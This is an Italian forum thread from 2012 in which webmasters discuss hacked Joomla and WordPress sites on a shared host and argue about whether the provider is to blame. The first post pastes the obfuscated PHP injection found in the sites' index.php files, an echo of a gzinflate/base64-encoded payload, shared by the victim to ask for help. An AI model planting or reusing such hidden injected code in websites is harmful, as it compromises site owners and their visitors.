Autore Topic: Attacco su Joomla e vari hosting  (Letto 5398 volte)

Offline Flaterik

  • Appassionato
  • ***
  • Post: 220
  • Sesso: Maschio
    • Mostra profilo
Attacco su Joomla e vari hosting
« il: 14 Giu 2012, 14:45:38 »
Salve a tutti, alcuni miei siti (Quasi tutti a dire il vero) su hosting isola felice ed altri , su piattaforma Joomla 1.5 piuttosto che 2.5 sono stati bucati
Questo il codice
L'attacco ha colpito tutti i file index.php di tutti i template.

Soluzioni per questo problema?

Codice: [Seleziona]
#c3284d#
echo(gzinflate(base64_decode("hVTLdpswEP2WsojAshQkAihV1C78CV1yvPADG04SgxGtT/DJv1dPwDlJu5AY5nHnzkijJ7nr6rb/0Xdv1zPetG152q+q+mUfnmEQRPx9t+l3VXi+RNdKoJjQ+5QPgwAbAMEL4AcBDp0SG7Ve1VpVSgeVuVsB/q5Bt+VxW4q2a/qmf2tLD7h9SI57GV011vAHYPl7K/suJDRBhNIIDgOXUhRrjRZWd3fDEP0Ezb4E34OAX0Rf1ZKX4lIcxkiig9b8JAqU4CRPl+qj9hynS4aZkbT2EWdUa/SeO9mo02VsBWZ2YyDUWqxjvESxUVHsjTn2zrn5n+MioizJZNcitRaTiRlos5Re45vUsSM7xlFfAMMTp9xnfLSRY33eNRsBPYkpwutswZqIo6Qoswl6XsyceIp9m9gM0HsaQiOcTZRPfZiX4gFcTvahQZ5u5nLY0BH6X72fdc153NC7OQacfwJtAadjZt7zlqAt7uYWfdYFNjrN0Iz3HI586NzU4dx1mH3lT+3mj/z/l9MEuOvsL7UbmnF21PA1XViLDFFE9OKIZBTW3wRFlNcQRtdnUes5lRL+6rv6dCyCQ9e8BjBYVeoJUPMarENEFg+LahGmkCxOxfM6Uq9KGUqpPk/37vn5Cw==")));
#/c3284d#


Il mondo è strano ma la gente è matta

mau_develop

  • Visitatore
Re:Attacco su Joomla e vari hosting
« Risposta #1 il: 14 Giu 2012, 15:06:21 »
hai detto tante cose, non hai detto la tua versione di joomla e se tutte le estensioni erano aggiornate.

Le soluzioni si trovano se si conosce interamente il problema, se qualcosa è sottinteso o non detto... fatica inutile.

cmq la sez giusta è "Sicurezza" dove in testa trovi un post con 6400 persone col tuo problema

M.

Offline Flaterik

  • Appassionato
  • ***
  • Post: 220
  • Sesso: Maschio
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #2 il: 14 Giu 2012, 15:24:00 »
Si, siti aggiornati . Le versioni, 2.5.4  1.5.26
Per i componenti no, qualcuno poteva non essere aggiornato a dire il vero.
grazie comunque per la risposta, vado su sicurezza
Il mondo è strano ma la gente è matta

mau_develop

  • Visitatore
Re:Attacco su Joomla e vari hosting
« Risposta #3 il: 14 Giu 2012, 20:42:13 »
hai ja_purity vecchio sulla 1.5?

M.

Offline Flaterik

  • Appassionato
  • ***
  • Post: 220
  • Sesso: Maschio
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #4 il: 15 Giu 2012, 08:55:33 »
No, su uno di questo ho i l 2 di Ja_purity ma è l'unico che ha superato indenne l'attacco

Ho un sito con Wordpress e ho avuto lo stesso identico problema!
Il mondo è strano ma la gente è matta

Offline Zapan

  • Nuovo arrivato
  • *
  • Post: 14
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #5 il: 24 Giu 2012, 10:52:09 »
Non vorrei faar polemica, ma anche un mio sito, hostato sull'isola felice, è "bucato": la cosa è successa allo scadere del contratto, invece della pagina di cortesia, è apparsa una pagina contenente spam.

Brava grande A, dopo i black out degli anni scorsi ora ti bucano i server.

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 30346
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #6 il: 24 Giu 2012, 11:35:18 »
@zapan
Perchè vieni allora a farla quì, mica è la sezione degli sfoghi & C. e cosa c'entra il forum col tuo hoster? Mica avrai scambiato la pagina pubblicitaria che ogni servizio hosting inserisce quando alla scadenza non si rinnova il dominio con quello che chiami spam. In ogni caso le rimostranze vanno fatte alla fonte del servizio, grazie.
NEWS DataGrill Xataface Installer (Ver. 1.0.1) per Joomla 3.8.x - DEMO Gestione Magazzino

Offline Zapan

  • Nuovo arrivato
  • *
  • Post: 14
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #7 il: 24 Giu 2012, 11:39:27 »
No non ho confuso nulla, la pagina era spam.
Ho scritto quì perchè anche questo utente aveva una pagina hostata sullo stesso provider. probabilmente hanno avuto problemi di sicurezza visto che anche il periodo era quello.

Lo scopo del mio messaggio era quello di far stare in campana utenti che potrebbero affidare la loro attività ad uno dei provide4r più publicizzati ma a quanto pare, meno sicuri.

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 30346
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #8 il: 24 Giu 2012, 11:41:44 »
Beh questa è una tua opinione e ti ripeto in questo forum non è consentito discutere di servizi commerciali nè tantomeno venire a lamentarsi, diffamare o quant'altro per essi, ti invito ad automoderarti, di nuovo grazie.
NEWS DataGrill Xataface Installer (Ver. 1.0.1) per Joomla 3.8.x - DEMO Gestione Magazzino

mau_develop

  • Visitatore
Re:Attacco su Joomla e vari hosting
« Risposta #9 il: 24 Giu 2012, 17:55:49 »
Lo scopo del mio messaggio era quello di far stare in campana utenti che potrebbero affidare la loro attività ad uno dei provide4r più publicizzati ma a quanto pare, meno sicuri.
-----------------------------------------------------------------------------
come fai a far stare in campana gli utenti se non sai nemmeno cosa è successo e perchè?

M.

Offline Zapan

  • Nuovo arrivato
  • *
  • Post: 14
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #10 il: 25 Giu 2012, 13:45:58 »
Sapere cosa è succeso e perchè non è sicuramernte facile, nemmeno cheidendo al provider che ignora le mie e mails (daltronde ora non sono più loro cliente).
Sembra almeno sospetto che sia io che Flaterik abbiamo affidato il nostor sito allo stesso operatore e ci siamo ritrovati con lo stesso problema lo stesso periodo.

Con questo chiudo.

mau_develop

  • Visitatore
Re:Attacco su Joomla e vari hosting
« Risposta #11 il: 25 Giu 2012, 15:28:56 »
Sembra almeno sospetto che sia io che Flaterik abbiamo affidato il nostor sito allo stesso operatore e ci siamo ritrovati con lo stesso problema lo stesso periodo.
----------------------------------------------------

..tu e flaterik? :) ... magari! ... moooolti di più, ma per accusare bisogna avere i dati per farlo altrimenti... aria fritta!

M.

Offline Zapan

  • Nuovo arrivato
  • *
  • Post: 14
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #12 il: 27 Giu 2012, 15:39:12 »
io non voglio accusare ma si fa presto a pensar male!

come si dice 2 indizzi sono quasi una prova certa.

Offline tomtomeight

  • Global Moderator
  • Fuori controllo
  • ********
  • Post: 30346
  • Sesso: Maschio
  • Gli automatismi aiutano ma non insegnano nulla.
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #13 il: 27 Giu 2012, 16:27:44 »
E non ti passa proprio per la testa che potrebbe essere colpa di un tuo o vostro inconsapevole errore no eh, si fa più presto ad accusare. Prove ci vogliono prove prima di pensar male e poi venire ad accusare. Con questo non voglio difendere nessuno, figuriamoci se hanno bisogno di essere difesi quì, E' solo una questione di correttezza e correttamente vorrei che la flame  finisse quì ad evitare di chiudere questo post, grazie e proccupiamoci di esternare solo dei servizi ed estensioni free, grazie.
NEWS DataGrill Xataface Installer (Ver. 1.0.1) per Joomla 3.8.x - DEMO Gestione Magazzino

Offline giusebos

  • Fuori controllo
  • *
  • Post: 19666
  • Sesso: Maschio
  • Giuseppe Serbelloni Mazzanti Viendalmare
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #14 il: 27 Giu 2012, 18:19:35 »
Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.

Tutti hanno la certezza matematica di aver fatto tutto con il giusto rigore e criterio.....


Per vostra informazione, parlo ai 2 utenti che hanno avuto lo stesso problema; Non ho avuto nessun problema negli utimi mesi (forse anni) riguardo le cose che lamentate con quel provider.

Ci sono impostazioni specifiche da configurare con certi hoster, impostazioni che devono essere impostate dagli utenti dopo che hanno LETTO una 20ina di righe di istruzioni, cosa che per esperienza non fa nessuno, compromettendo installazione e sicurezza.

Per voi consiglio un servizio di hosting dedicato a joomla, così non dovrete leggere niente e tutto funzionerà sempre o quasi. :)
su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

mau_develop

  • Visitatore
Re:Attacco su Joomla e vari hosting
« Risposta #15 il: 27 Giu 2012, 19:20:37 »
Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.
----------------------------------------------------------------------------------------------------------
...mah..sai... a volte è la vita stessa a punire questo atteggiamento perchè comunque all'hoster gliene frega nulla dei tuoi problemi e se cambi servizio li hai comunque.

Risultato...sempre problemi tuoi sono...poi se vuoi dai la colpa al mondo... intanto lui gira...

M.

Offline Flaterik

  • Appassionato
  • ***
  • Post: 220
  • Sesso: Maschio
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #16 il: 02 Lug 2012, 10:21:20 »
Scusate non era mia intenzione scatenare un vespaio.
Comunque c'e' poco da dire. Le pagine che avevo nell'isola e ancora UNDER CONSTRUCTION con il loro messaggio fatto dal fornitore stesso, quindi pagine senza componenti o altro, sono TUTTE BUCATE.

Credo che questo ponga fine alla disputa.
Il mondo è strano ma la gente è matta

Offline Flaterik

  • Appassionato
  • ***
  • Post: 220
  • Sesso: Maschio
    • Mostra profilo
Re:Attacco su Joomla e vari hosting
« Risposta #17 il: 02 Lug 2012, 10:24:45 »
Certo che l'umiltà di dire "forse c'è qualcosa che ho sbagliato" sono in pochi ad avercela in questo forum.

Tutti hanno la certezza matematica di aver fatto tutto con il giusto rigore e criterio.....


Per vostra informazione, parlo ai 2 utenti che hanno avuto lo stesso problema; Non ho avuto nessun problema negli utimi mesi (forse anni) riguardo le cose che lamentate con quel provider.

Ci sono impostazioni specifiche da configurare con certi hoster, impostazioni che devono essere impostate dagli utenti dopo che hanno LETTO una 20ina di righe di istruzioni, cosa che per esperienza non fa nessuno, compromettendo installazione e sicurezza.

Per voi consiglio un servizio di hosting dedicato a joomla, così non dovrete leggere niente e tutto funzionerà sempre o quasi. :)

Tralaltro ho specificato che non avevo componenti completamente aggiornati ed ho fatto il mea culpa. Salvo poi scoprire che le pagine PHP fatte da loro come pagine temporanee erano a loro volta BUCATE. Di conseguenza non credo a questo punto , che sia colpa di Joomla non aggiornato
Il mondo è strano ma la gente è matta

 

Host

Torna su